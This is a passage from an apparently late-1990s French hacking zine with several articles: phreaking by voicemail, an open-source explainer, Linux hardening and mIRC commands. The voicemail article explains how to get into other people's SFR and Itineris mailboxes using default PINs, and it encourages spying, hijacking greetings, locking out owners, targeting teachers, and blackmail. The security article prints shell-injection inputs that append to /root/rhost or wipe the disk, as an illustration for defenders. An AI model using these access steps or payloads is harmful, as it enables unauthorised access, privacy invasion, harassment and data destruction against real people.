Pour fignoler tout ca, vous prenez un boitier DTMF ou un soft dans le meme style, et vous faites un enregistrement qui fait le numero de la VMB, un petit blanc, les commandes pour entrer dans la boite vocale, puis le fichier, et enfin la commande de sortie de la VMB, hop vous avez plus qu'a passer l'enregistrement.
***********************************************************************
III) Le protocole RTTY
1) Fonctionnement théorique
Le RTTY (je sais pu ce que ca signifie les initiales), est un protocole qui permet la transmission de données via les ondes radio, il s'agit en clair d'un protocole qui fait correspondre une frequence à 1 et une frequence à 0, donc n'importe quel fichier informatique converti en binaire peut etre transmis. Le problème, c'est que je ne connais pas de programmes semblables à ceux de SSTV, capables de convertir un fichier en son. Pour communiquer en RTTY il y a la solution de la carte BAYCOM : ca peut s'acheter dans les boutiques de radioamateur (ou peut etre même dans le commerce), ca peut se fabriquer, mais la je suis pas un pro de l'electronique donc j'en parlerai pas. Certains utilisent leur carte son avec un protocole bien à eux inventé sur la base du RTTY : pourquoi pas ? Il suffit de faire un programme simple qui ouvre un fichier en bianire, emmet un son pour 0 et un autre pour 1. Jusque là aucun problème c'est franchement à la portée du premier venu, on peut meme faire ce programme en Qbasic. Le probleme c'est pour la reception, parceque la il s'agit d'un programme d'analyse de frequence : soit vous etes très courageux et vous vous lancez dans ce projet, soit vous optez pour le RTTY classique.
2) Application
Bon la procédure est simple si vous avez acheté ou fabriqué une carte Baycom sinon pour l'envoi de fichiers via votre carte son il va vous falloir des logiciels : pour emmetre c'est simple du moment qu'on a les frequences, mais pour recevoir je ne connais pas de logiciel (s'il existe et qu vous l'avez ou que vous l'avez fait mailez moi), vous allez galerer. Utilisez la methode "carte son" si votre destinataire a une carte Baycom et pas vous. Enfin vous pouvez toujours transferez vos fichiers en morse (rigolez pas, le RTTY c'est comme du morse binaire). Bon l'avantage du RTTY c'est qu'il est tres fiable, avec peu d'erreurs, mais c'est très lent, eviter les envois de plus de 5 ko pour pas saturer le repondeur de la VMB (zippez et coupez en petit morceau, sur plusieurs boites)
Frequences pour le protocole RTTY:
A la vitesse de 45 millisecondes, 1 vaut 1275 Hz et 0 vaut 1445 Hz
Pour 50 millisecondes, c'est 1275 Hz pour 1 et 1700 Hz pour 0
A 75 ms, 1 vaut 1275 Hz et 0 vaut 2125 Hz; a 100 ms, 2125 Hz pour 1 et 2295 Hz pour 0, a 110 ms, prenez 2125 Hz pour 1 et 2550 Hz pour 0. Enfin, pour 300 ms, prenez 2125 Hz pour 1 et 2975 Hz pour 0.
IV) Zi end
Le systeme SSTV est performant mais limité par le fait qu'il ne permet que le transfert d'image, le protocole RTTY permet le transfert de n'importe quel fichier mais est moins pratique. Si vous voulez transferer autre chose que des images, choisissez RTTY, sinon SSTV, enfin avec RTTY faites attention : a vouloir transferer n'importe quoi vous risquez d'obtenir un message tros gros qui risquerait d'etre grillé par la boite.
Greetingz : tout ceux qui m'ont demander d'etudier le transfert de fichier par VMB, et tous mes amis radioamateurs qui m'ont appris les ifferents modes de transmissions.
LES NEWBIES D'AUJOURD'HUI SERONT LES GRANDS HACKERS DE DEMAIN
FT, ENLEVE TES FILTRES SUR TES LIGNES QU'ON PUISSE BLUE BOXER (Nd Ad-tonnou --> vouis, FT tu nous emmerdes à la fin...)
_
| |
| |
| |
| |
| | __ _ _ * __ __
| |___|_ / _ /_\ | | / |_
|_____|__\_// \|_ | /__|__
P H R E A K I N G
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Hack de Répondeurs de Portables Ad-Tonnou
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
*******************************************************
** HACKER LES REPONDEURS DE PORTABLES...by ad-tonnou **
*******************************************************
1) INTRO
~~~~~~~~
Alors voila, je vous ai pondu un petit article bien sympa parlant de repondeurs de portables, plus precisement des répondeurs SFR et ITINERIS.
Je ne pense pas que cette info soit exclusive et je ne pense pas non plus être le seul à savoir ce que je vais vous dire (loin de là).
Cependant vu que je n'ai jamais rencontré cette info dans aucun des zines que j' ai pu lire auparavant (et dieu sait que j' en lit des tonnes), je me suis dit que ça pourrait être bien sympa de la mettre dans le numéro 1 de allianX...arrétons le bla-bla et passons à la technique...
2) SFR
~~~~~~
Ce matin je lis mot pour mot dans mon guide SFR dans la section "COMMENT UTILISER VOT' REPONDEUR":
"vous pouvez écouter vos messages vocaux depuis un autre téléphone que le votre.
-composez votre numéro d' appel SFR
-Tapez # pendant l' annonce d' accueil
-Puis tapez votre code secret suivi de #"
Et la vous vous dites...."hum tu es beau ad-tonnou (ad pour les intimes) mais comment veux tu que l' on connaisse ce code....puisque comme son nom l' indique, il est secret...?"
La je vous répond : attendez la suite boudjiou...
Je reprend: je continue et mon guide me dit :
" (...) Votre code secret initial est le 1 suivi des 5 derniers chiffres de votre numéro de portable..."
Vous aurez sans doute compris maintenant...NON ? ARF !
Une grande part (tres grande!!---> rien que dans mes connnaissances : 5/7) des utilisateurs moyens ne personalisent pas leurs répondeurs, et donc conservent le code d' acces au répondeur par défaut...ce qui nous fait un bon paquet d' idiots à faire chier...
EXEMPLE ---> Mon numéro est le 06.17.ab.cd.ef mon code d'acces à distance à mon répondeur sera donc 1bcdef
bcdef étant les 5 derniers chiffres de mon numéro d'appel.
Voila pour la petite info (merci qui ?)
Ah oui, pour la petite info les numéros SFR ne peuvent être que de cette forme : 0619...0614...0615...0617...(je crois qu' il y en a un autre mais je sais plus...)
Mais attendez, c'est pas fini, j' ai décidé de pousser la perversion jusqu'au bout et de rechercher comment faire avec les répondeurs ITINERIS...c' est pas plus compliqué...
3) ITINERIS
~~~~~~~~~~~
Alors la je vais faire vite car j' ai mon Bac à reviser...
Avec les ITINERIS c' est pareil, pour accèder à une messagerie à partir d' un autre poste, on compose le 06 07 07 +les 4 premiers chiffres du numéro du portables...
Ensuite on arrive à un répondeur puis on doit faire le numero du portable en entier puis son pass...
---> Ici le code secret par défaut est le 0000.... <---
Voila....
4) QUE FAIRE AVEC CA ???
~~~~~~~~~~~~~~~~~~~~~~~~
Les menus auxquels on accède: "changer le pass","écouter les messages","changer l'accueil"
Après c'est à vous de voir...
La première utilisation qui viend à l' esprit c'est l'espionnage...En effet c'est bien pratique de voir ce qui se passe chez un pote et les messages qui transitent par son répondeur (essayez, les potes ne sont pas toujours ce que l' on pense)
Moi j' ai fait du chantage à un mec que j'avais trouvé au pif (mais non je suis pas cruel), je lui avais dit qu' il devait trouver mon prénom si il voulait récuperer son répondeur....
vous allez rire mais on est devenu potes...
Sinon c' est pas mal aussi de changer l'accueil sans cesse, si le gars (ou la garse) est con (50% des cas) il ne comprendra vraiment pas pourquoi il a des messages d'accueil du genre : "humm...c 'est Lolita, viens me rejoindre...."
Il reagira en restituant son ancien message d'accueil mais ne se dira pas qu'il lui faut changer son pass...et vous aurez en prime les messages de ses potes.
Ou bien on peut tout simplement changer le pass, a la place de 0000 ou de 1+5 chhiffre; vous mettez un truc a vous, et là le repondeur vous appartiendra, mais ca c'est vraiment méchant....
(Essayez avec les numéros des profs que vous aimez pas...)
Mais bon, il doit y avoir plein d' utilisations différentes, à vous de trouver...
5)PETITE MISE EN GARDE
~~~~~~~~~~~~~~~~~~~~~~
/!\Attention à la facture, en effet je vous rapelle que quand vous appelez un répondeur de portable c' est au même tarif que quand vous apelez un pote sur un portable...
C' est pas si cher que ça mais il ne faut pas en abuser comme je l'ai fait.
Donc prenez garde, ne vous en servez qu'en cas de besoin ou pour délirer de temps en temps...
Voila j' ai fini, pour toute faute de ma part ou commentaire...
ad_tonnou@yahoo.com
ou alors la vmb officielle de la team 3651 0800 010 800,,9,*4540 et biiip :
PS : Mailez moi si vous êtes interéssés par allianX #2, si vous voulez nous aider et pourquoi pas devenir membre, hésitez pas...
--== Ad-Tonnou, pour vous servir... ==--
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Le Concept d'Open Sources Redfire
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
********************************
** CONCEPT DE "L'OPEN SOURCE" **
** (par redfire) **
********************************
Comment parler de Linux et des logiciels libres en general sans evoquer les abreviations comme GPL,MPL,QPL,BSD,ou encore LGPL ?
Ces termes recouvrent tous un même type de documents juridiques : les fameuses licences
d'utilisation.
Tous les logiciels,sans exception,sont protégés juridiquement par un texte de ce type,qui énumère les droits que vous donne l'auteur sur son programme.
Ainsi, les longs textes,ou contrats,souvent ponctués par "j'accepete" ou "je n'accepte pas" ,ont une importance capitale pour leur utilisation.
Ils vous disent ce que légalement,vous avez le droit de faire avec le logiciel que vous allez installer.
Cependant, un logiciel, pour être considéré comme libre, doit fournir plus que ses seuls codes sources..(voir "The Open Source Definition" : www.linux-france.org/article/these/osd/fr-osd-1.html)
Il doit répondre aux critères suivants :
Libre redistribution :
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
La licence ne doit pas empêcher de vendre ou de donner le logiciel.
La licence ne doit pas exiger que cette vente soit soumise a l'acquittement de droits d'auteur ou de royalties.
Code source :
¤¤¤¤¤¤¤¤¤¤¤¤¤
Le programme doit inclure le code source et la distribution,sous forme de code source comme sous forme compilée.
Il n'est pas autorisée de proposer un code source rendu difficile à comprendre.
Il n'est pas autorisée de proposer des formes intermédiares,comme celles qu'engendrent un
préprocesseur ou un traducteur automatique.
Travaux dérivés :
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
La licence doit autoriser les modifications,les travaux dérivés et leur distribution sous les mêmes conditions que celles qu'autorise la licence du programme original.
Intégrité du code source de l'auteur :
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
La licence ne peut restreindre la redistribution du code source sous forme modifiée que si elle autorise la distribution de fichiers "add-on" aux côtés du code source dans le but de modifier le programme au moment de la construction.La licence doit explicitement permettre la distribution de logiciels construits a partir du code source modifié.La licence peut exiger que les travaux dérivés portent un nom différent ou un numéro de version distinct de ceux du logiciel original.
Pas de discrimination :
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
La licence de doit opérer aucune discrimination à l'encontre de personnes ou de groupes de
personnes.
La licence ne doit pas limiter le champ d'application du programme.Par exemple,elle ne doit pas interdire l'utilisation du programme pour faire des affaires ou dans le cadre de la recherche.
Distribution de la licence :
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
Les droits attachés au programme doivent s'appliquer à ous ceux à qui le programme est redistribué sans que ces parties ne doivent remplir les conditions d'une licence supplémentaire.
La licence non spécifique :
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
Les droits attachés au programme ne doivent pas dépendre du fait que le programme fait partie d'une distribution logicielle spécifique.
Non contamination :
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
La licence ne doit pas apposer de restrictions sur d'autres logiciels distribués avec le programme qu'il couvre.
Par exemple,le licence ne doit pas exiger que tous les programmes distribués grâce
au même médium soient des logiciels "open source".
Exemples de licences :
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
Les licences suivantes sont des exemples de licences que nous considérons conformes à la définition de "l'open source" : GNU GPL,BSD,X Consortium,et Artistic? C'est aussi le cas de la MPL.
Extraits de "The Open Source Definition"
Vous vous apercevez maintenant que,la notion de "open source",bien qu'elle paraisse assez simple, est en fait strictement controlée et remplies de nuances juridique très importante.
La licence la plus répandue dans le monde Linux et aussi celle qui est la plus lourde de sens.
La Gnu Public Licence ou GPL a été écrite pour la 1ere fois par Richard M. Stallman en 1984.
En tant que licence "Open Source" ou licence libre,elle autorise la libre copie,la libre modification et la libre distribution du logiciel qu'elle protège.Mais le GPL est plus restrictif que la simple définition de l'Open Source.En effet,la définition du logicle libre n'a été que rédigée en 1998.
Mais c'est GPL qui a fait evolué les choses...
Aujourd'hui,les logiciels en Open Source commence a prendre de plus en plus de poids.On retrouve un principe de partages de connaissances.
Grace a la diffusion des codes sources,un petit programme en bêta se retrouvera vite en version bien plus complete,améliorée et corrigée de ses bugs.
Ce sont les utilisateurs eux-même qui font evoluer le logiciel.
Si Linux est en constante amélioration,c'est grâce à la diffusion de son code source.En effet, si Linux est aujourd'hui un des OS les plus stables et les plus sûrs dans le monde,ce n'est pas un hasard : chaque fois par exemple qu'une faille de sécurité est détectée dans le kernel,une mise à jour est disponible très peu de temps après sur Internet.Et ainsi va la communauté Linux :
Une parfaite évolution.De quoi donner des leçons à certaines multinationales.... (Nd Ad-tonnou --> ha bon ?? qui ??)
Et puis des éditeurs comme Mandrake ou SuSe nous montrent bien qu'il est possible de vivre de la diffusion d'un OS libre : suite de logiciels,documenation riche et détaillée,et service techniques performants sont autant de services qui plaisent aux utilisateurs débutants.
En ce qui concerne les suites bureautiques,on a pas encore atteint le stade d'Open Source,mais
les choses avancent.Citons par exemple StarOffice,qui est disponible en version complete sur des
CD-ROM de mag,mais qui ne propose pas encore ses sources.
Voilà voilà,j'en ai finis avec cette article sur l'Open Source.
Je sais bien que c'était pas vraiment un article de hack,mais au moins,c'est original et c'est pas du réchauffé,na ! :)) (Nd ad-tonnou --> bien envoyé red)
J'espere qu'il vous aura quand même plu... Le sujet Linux est vaste, et j'aurais l'occasion d'y revenir dans mes prochains articles...
redfire
redfire@ifrance.com
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Secu Linux [-AhfeeLinuX-]
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
=--------======== Linux et la securitée ===========-----------
Linux, probablement le systeme d'exploitation le plus securisé! voyons ca de plus pres , avec des explications ...
Sous linux, comme sous n'importe quel OS, il y a des failles! Elles sont généralement provoquées par des programmes comme Sendmail et compagnie.
Nous allons voir comment tester nos protections.
Tout dabord, il vous faut un Scanner d'exploit , ex : SATAN ( Security Administrator Tool for Analising Network ) ou d'autres , voici les URL's :
Satan : www.trouble.org/~zen/satan/satan.html
ABACUS-sentry : http://www.psionic.com/
Nessus : http://www.nessus.com/ ( pour avoir de plus amples information sur l'installation de Nessus , contactez moi a
open-sockz@isecurelabs.com
Nmap : www.insecure.org /nmap
Ces programmes servent a connaitres vos port ouvert, vos services, et surtout, les failles de votre system ( ou d'un autre ;) etc ...
Une fois la faille detectée , deux solutions , sois vous avez un bon firewall , sois vous changer la version de votre programme et vous pasé a une
version ultérieure. Mais attention , un bon firewall est tout de même mieux , car même avec une version ultérieure , il y a des failles, peut être pas les mêmes mais en tout cas il y en a quand même!
Pour avoir un exemple de bon firewall, je vous conseille d'aller voir le site http://www.freshmeat.com/ et de rechercher firewall ou Ipchains, mais si vous voulez un bon firewall fait en perl utilisant ipchains (il est totalement configurable !! ) contactez moi a open-sockz@isecurelabs.com !
Les failles, appellés Exploit (Nd ad-tonnou --> les exploits, c'est plutot les procédures à faire pour exploiter ces failles), servent aux hackers pour penetrer dans un system, si la faille se trouve dans sendmail version 2.3.4, le hackers va voir sur un site comme http://www.r00tabega.com/ ou http://www.isecurelabs.com/ ou encore http://www.rootshell.com/ ainsi que http://www.technotronic.com/
Une fois qu'il a trouver le programme pour exploiter la faille de sendmail , il l'execute a partir d'un shell distant et voila, system pénétré !
Si vous aimez tout ce qui est hacking , moi aussi ! http://www.isecurelabs.com/ est mon site ( avec un pote ) et je pense que l'on a la liste d'exploit la plus grosse entre tout ces sites.
C'est pourquoi il est tres important de se proteger! car la faille est vite arrivée !
Tout dabord , une configuration adequate de /etc/inetd.conf . Selon pas mal de gens , une bonne partie de la secu serais dans le kernel ! mais je n'ai
pas encore eu le temps de voir ca :(
Pour un minimum de securité , va dans un terminal et tape /mcedit /etc/inetd.conf
il faut te securiser sur les Rcmd et tout ca ! alors descent dans le rep , et tu vera :
# Shell, login, exec and talk are BSD protocols.
#
# shell stream tcp nowait root /usr/sbin/tcpd in.rshd -L
# login stream tcp nowait root /usr/sbin/tcpd in.rlogind
# exec stream tcp nowait root /usr/sbin/tcpd in.rexecd
# talk dgram udp wait root /usr/sbin/tcpd in.talkd
# ntalk dgram udp wait root /usr/sbin/tcpd in.talkd
#
# Kerberos authenticated services
#
# klogin stream tcp nowait root /usr/sbin/tcpd rlogind -k
# eklogin stream tcp nowait root /usr/sbin/tcpd rlogind -k -x
# kshell stream tcp nowait root /usr/sbin/tcpd rshd -k
#
a mon avis , il y aura des lignes ou yaura pas la # , ba il fo la mettre , comme ci dessus ! la tu es securisé , descendon un peu plus bas encore !
#
# finger stream tcp nowait nobody /usr/sbin/tcpd in.fingerd -u
# systat stream tcp nowait nobody /usr/sbin/tcpd /bin/ps -auwwx
# netstat stream tcp nowait root /usr/sbin/tcpd /bin/netstat -a
#
tu pourras voir ca, a mon avis il manquera le # a netstat et systat, bref tu les mets!
Dans mes expemples, elles y sont deja car je suis deja securisé !
la , tu tape F2 , et F10 ! et ca y est ! tu es secu pour ca ! il te reste a taper :
killall -HUP inetd
pour reinitialiser le deamon , donc pour qu'il prenne en compte les modif et voila!!!
En fait ces modif servent a Bloquer l'access a certaine facon de se logger qui peuvent faire d'autres utilisateurs des root ...
bref , la tu es securisé !
Si tu veux securisé encore plus ton system , il y a des fichiers comme :
/etc/sudoers , ce fichier te permet de definir les programmes autorisés par qqun qui est logger en Super Utilisateur ( presque root ) avec la commande su.
/etc/ftpusers , dans ce fichier , si tu met un login dedans , la personne a qui appartien ce login , ou qui se loggera avec ce login ne pourra pas acceder a ta machine en ftp , en gros si tu met un login dedans , ce login peu pas venir en ftp sur toi.
ipchains , cette commande est un firewall , tu pourra apprendre a ten servire en tappant ipchains --help ou encore man ipchains
Article ecris par [-AhfeeLinuX-] - ahfeelinux@caramail.com - 1999-2000
AllianX.
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Secu Linux Sauron
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
salut,
Aujourd'hui on va causer securite linux,histoire de varier un peu ;o)
Alors, il faut savoir que la premiere chose que va faire un Cracker va etre
de scanner votre machine afin de voir quels sont les ports d'ouvert, et ainsi
de determiner les services qui trournent sur votre machine. Quand je scan une
becane et que je vois le port 79 d'ouvert par exemple, la premiere chose que
je vais faire est de lancer finger sur les noms d'utilisateurs les plus courants
(ceci est valable pour tous les os si le 79 est attribué au service finger)
Mon but etant dans un premier d'obtenir de l'informations sur la cible afin de trouver
ce a quoi elle est vulnérable. Plus il y a de port ouvert, plus il y a de service qui
tourne, donc logiquement plus il y a de possibilité d'exploit... Et il est tres simple de
se procurer tous les exploits recensé sur un systeme en moins de 2 minutes ! Aller par exemple
sur ftp.technotronic.com qui est un tres bon debut, ou procurez vous l'archive des hole de
www.hack.co.za ( site maintenant fermer depuis qu'un abruti a obtenu le root sur leur hebergeur ! )
Il vous faut donc restreindre
les services au minimums dont vous avez besoins, pour cela editez /etc/inetd.conf
et mettez un # devant toutes les lignes des services qui ne vous interessent pas.
Relancez inetd ( killall -HUP inetd ). Voila deja une bonne chose de faite, ce n'est bien sur pas
suffisant. De nombreux scanner tres utiliser comme sscan ou exscan pour Unix avouent utiliser les
messages apparaissant lors d'une conection sur un service. Par exemple sur dans de nombreuses
distributions linux, le messages par default de tels service annonce le systemes d'exploitation
utilisé, sa version, ainsi que le numero du kernel utilisé! (par exemple telnet www.server.com 25 vous donnera la version du sendmail de www.server.Com)
De tel informations sont crutiales pour un pirates, car uniquement a partir de cela il peut
gagner un root sur votre machine en allant chercher un quelquonque exploits marchant sur votre
systeme si vous ne l'avez pas patcher ; d'où l'interet d'aller chercher tous les correctifs
sur les sites officiels et de s'abonner au liste de diffusion relatant de securité informatique.
En adoptant cette conduite vous serez averti en même temps que les crackers et même si le
correctif n'est pas sorti vous pourrez au moins desactiver provisoirement le service
vulnérable.
## NOTE ##
/etc/issue pour modifier le message d'arriver.
## EON ##
Assurer vous d'utiliser une version recente des services ou prener au moins la peine de
les patcher. Verifier que tous les comptes par default offrant des privileges root sont bien
verrouiller ( un * dans le deuxieme champs dans les fichiers /etc/passwd ou /etc/shadow pour linux ).
Au pire changer les mots de pass. !!! Utilisez des passwd complexes, alliant chiffre et lettres !!!
Trouver des passwd qui ne sont pas des dico de pass. Avec la commande chmod, assurer vous que
le maximum de fichiers inutile au simple users ne leurs sont pas accecibles, pas meme en lecture!
## NOTE ##
Il vous parait peut etre inutile de cacher /bin, cependant sachez que c'est essentiels !
Ce n'est pas la peine de se donner du mal a cacher votre os si vous permettez aux simple user de
le determiner. D'autant plus si vous offrez un compte par default comme anonymous (ftp dans le fichier
passwd). Dans une telle situation, je me log en simple user, je d/l un fichier de /bin ( ls par exemple )
et je determine pour quel systeme il a été compilé.
## EON ##
Ca ne suffit pas encore!! Si vous offrez un service de page web, assurez vous que http n'est pas lancer en
tant que root. Encore plus si vous executer des scripts cgi ! Et encore encore plus si vous creer vos propre
script cgi ! J'avais envisager a une epoque de mettre a dispositions les nombreux article relatant de securité
que je possede. Pour ne pas avoir a faire des pages web avec des liens et un descriptif de chacun des articles,
je voulais mettre un script cgi, qui aurait rechercher les fichiers dans lesquelles aurait ete present le mot taper
par les visiteurs de ma page. Pour cela je comtai utiliser un script perl faisant appel au shell de cette maniere :
system("grep $motchercher /home/sauron/documents/");
Un appel systeme réalisé de telle maniere peut saverer tres tres dangereux si httpd est lancer en tant que root,
en fait il offre un shell a qui veut ! Bien que l'utilisateur n'ai que une page web sous les yeux avec un champs pour
marquer le mots rechercher il peut effectuer n'importe quelle commande sur le systeme si l'utilisation des metacaracteres
n'est pas bloquer dans le script. Dans le shell, on peut effectuer deux commande sur une meme ligne en les separant par
un
point virgule, dans le champ de la page web, on pourrait tromper le serveur en entrant ceci dans le champ :
hack ; echo " + + " >> /root/rhost
par exemple ou
ljjm ; rm -rf /
pour fromat tous le system !! Voici pk il ne fo pas utiliser de script cgi si httpd est lancer en tant que root.
Bien sur, toutes les failles cgi ne sont pas lié a cette commande en perl. La fonction sytrcopy() en C provoque
également une faille c'est pk il faut utiliser strncopy(), et il y en a encore des tas. Je conseille le scan
hackboard fait par kosak pour windows ( isecurelabs.com ) ou celui riven de zorgon pour linux ( zorgon.freeshell.org ).
Bien sur, uniquement en attendant le miens ;oD (Nd ad-tonnou; paraitra dans allianX j'espere...)
Afin de securiser votre systeme il vous faut absolument empecher les crackers d'obtenir de l'info. sur votre
systeme, WHOIS, host, la command expn dans sendmail, etc.....
Je ne vais pas détailler chacune des marches a suivre, d'autant que certains l'ont deja fait ( aller voir www.multimania.com/ouah )
Il est difficile de se proteger du tcp fingerprinting qui permettra a l'attaquant de savoir qu'elle systeme vous utiliser
en envoyant des paquets specifiques et en analysant la reponse, variable d'un systeme a l'autre.
Faites bien attention a vous proteger du spoofing en ne faisant confiance a aucun systeme !! Meme si un ami a un ip
constant et que vous voulez luidonner des privileges root, ne lui donner pas acces a rlogin, offrer lui un shell en telnet avec un pass compliquer ! Ceci pour deux raisons :
*** Si votre amis se faisant lui meme hacker, vous comprometez votre systeme puisuqe son cracker pourra avoir egalement un shell root sur votre machine, et ce, sans que vous vous en rendiez compte, puisqu'a vos yeux, c'est votre amis qui est connecter !
*** De plus, si un Cracker est en mesure de prevoir vos numéros de sequence, il floodera votre amis et se connectera a votre machine en utilisant l'adresse de votre amis. Etant donner la complexiter d'une telle attaque, il lancera quelque commande a l'aveuglette mais un echo "+ +" >> /root/rhost est si vite lancer ! ( c'est de cette maniere que Mitnick a pirater son ancien pote Tsutomu ou un truc comme ca ).
Et au cas ou un pirates obtiendrait le root sur votre machine, installer des programmes qui surveille si une rootkit n'est pas installer par exemple. Ajouter les options -l -L et -o a la fin de chaque ligne de inetd.conf pour que vos logs soit plus important. Le must serait d'avoir un serveur de log distant, meme sur un reseau locale et ou les donnee sont uniquement inscriptible, comme ca votre cracker ne pourra pas effacer son ip des log, si il n'a pas effectuer une attaque par rebond !
Voila, je vous ai presenter quelque aspect de la securité informatique, il y en a encore de nombreux, mais je ne pretend
pas vous apprendre a securiser une machine efficassement mais simplement a vous donner les bases, le minimum.
Je vous conseille egalement de telecharger sur le site de ouah un programme qui simule de nombreuse vulnérabilité pour
en realité mieux logger votre pirates... Voila, ces quelques astuces decourageront les pirates cherchant des machines facilement vulnérable pour obtenir des shell et attaquer d'autres machines, mais peut etre pas les acharner.
N'oubliez pas d'essayer de vous pirater, au moins avec les outils les plus utilisé, nmap et les autres pour voir ce que cela donne; pour savoir qu'elle information obtiendrait tout individus vous scannant.
Pout tout apport, critique, remarque ou autre ===> humour@humour.com
PS : je me demande si il ne serait pas possible de changer le module gerant le renvoie de paquets tcp/ip, celui qui offre la possibilité au attaquant de decouvrir votre os par tcp fingerprinting pour le remplacer ou le modifier pour qu'il reponde comme repondrait un autre os comme win par exemple.. Je ne me suis pas pencher sur la questions mais j'aimerais vivement savoir si c'est possible. Vous pouvez me trouver sur l'irc sur irc.neoserv.net sur #linux
--== SAuron de Mordor (héhéhé) ==--
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Mirc Scripting FT-One
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
=================================INTRODUCTION A L'IRC SCRIPTING================================
Avant d'attaquer le scripting, voici un rappel des differentes commandes principales :
Voici les commandes principales :
/connect : se connecter
/disconnect : se déconnecter
/join #canal : rejoindre le canal de votre choix . « #canal » dans ce cas .
/part #canal : quitte le canal de votre choix .
/nick moi : Vous donne le surnom « moi »
/list : fait la liste des canaux
/quit : Vous déconnecte de lIRC .
/msg A lut : Vous enverrez le message « lut » a lutilisateur A
/query A : Ouvre une fenêtre de discussion avec lutilisateur A
/whois A : Obtenir des informations sur lutilisateur A
/me sen va : décrit ce que vous faite ( ici, ca donnera « *moi sen va » (puisque votre surnom est moi ))
/ame salut : écrit « salut » dans tous les canaux dans lesquels vous êtes .
/away travail : Lorsque les autres utilisateurs vous envoient un /msg, un message spécifiant que vous êtes occupe sera envoyé avec la raison : travail . retapez /away pour désactiver loption
/invite A #FR : Invite lutilisateur A sur le canal #FR
/topic #FT bye : Changera le sujet du canal #FR en Bye
/echo 5 lut : écrira « lut » avec la couleur 5 et sans afficher votre surnom (vous pouvez aussi mettre de la couleur avec ctrl+k)
/ajinvite on/off: choisir de rejoindre automatiquement un canal sur invitation
/dns A : retourne lIP de lutilisateur A
/log on/off #fr: sauvegarde ce qui est dit dans #fr dans un fichier log
/exit : quitter mIRC
Maintenant, les commandes réservées aux opérateurs :
/kick #FR A : Expulse lutilisateur A du canal #FR
/mode #FR [+/-] [bilmnopstk] b : bannir un utilisateur
i : mettre laccès au canal sur invitation
lx : limiter le canal a x utilisateu
m : modérer le canal ( seuls les opérateurs et les utilisateurs voicés peuvent parler )
n : interdire les /MSG externes au canal
o : donne le mode opérateur a un utilisateur .
p : mettre le canal en mode privé .
s : mettre le canal en mode secret .
t : le topic ne peut être change que par les operateurs
k : laccès au canal est protégé par un mot de passe
_______________________________________________________________________________________________
Les Identificateurs remote : (cette liste est loin dêtre complète, mais les identifieurs les plus importants y figurent )
$address
Donne ladresse de la personne qui a déclenche un événement .
$asctime(hh:nn:ss)
Donne lheure
$fulladdress
Donne ladresse complète de la personne qui a déclenche un événement .
$chan
retourne le nom du channel associé a un événement .
$clevel
Donne le niveau de lutilisateur qui a déclenché un événement
$dlevel
Donne le niveau des usagers par défaut . ( 1 normalement )
$event
Donne le nom de événement qui sest produit .
$groupe(N/#)
Donne le statut ou le nom dun groupe
Attributs: statut, name, fname
$group(0) Donne le nombre dutilisateurs.
$group(1) Donne le nom du premier groupe.
$group(2).name Donne le nom du 2e groupe.
$group(#abc).fname Donne le nom de fichier dans lequel le groupe est présent .
$group(1).status Répond par la valeur on ou off pour le premier groupe.
$group(#abc) Répond par la valeur on ou off pour le groupe #abc.
$ial
Retourne $true si la Liste Interne d'Adresses est active, et $false si elle ne lest pas .
$maddress
Donne ladresse qui a provoqué un événement .
$matchkey
Donne le texte avec des (*) qui a été utilisé dans lévénement remote.
$mode(X)
Retourne le nick n°X affecté par un changement de mode de canal.
Les différent attributs étants : op, deop, ban, unban, voice, devoice, help, dehelp
$mode(0).op Si la valeur de (x) est 0, alors la réponse sera le nombre total de nick oppés
$mode(2).op Si la valeur est un chiffre non nul, alors la réponse sera le nick oppé n°x
Note: Cette identifieur est utilisé seulement avec les événements on OP/DEOP etc.
$nick
Donne le nick qui a déclenché un événement
$script
Donne le nom du fichier de remote qui est en train de sexécuter .
$script(N/fichier)
